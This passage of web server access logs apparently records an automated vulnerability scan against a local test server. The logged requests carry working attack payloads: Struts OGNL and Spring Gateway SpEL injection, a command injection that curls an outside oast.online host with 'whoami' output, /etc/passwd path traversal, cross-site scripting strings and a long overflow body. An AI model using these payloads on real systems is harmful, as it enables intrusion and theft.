+0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/297MdqkCegDHtzOSyOw6mqbrJCh/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22c9v8hs0smpv8c6ag07h0qruc96txbk3ts.oast.online\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/297MdqkCegDHtzOSyOw6mqbrJCh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/297MbDg1RCqEvWuhlp0md6lYdl0.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/297MdqkCegDHtzOSyOw6mqbrJCh], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x22297MdqkCegDHtzOSyOw6mqbrJCh\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22c9v8hs0smpv8c6ag07h0bk7czgd3k6x1z.oast.online\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/297MdqkCegDHtzOSyOw6mqbrJCh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /297MdsyYsLWTQkrB7PHR4cNytcY.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://c9v8hs0smpv8c6ag07h01eqd9nq4su1ga.oast.online/`whoami`; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MdsyYsLWTQkrB7PHR4cNytcY.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA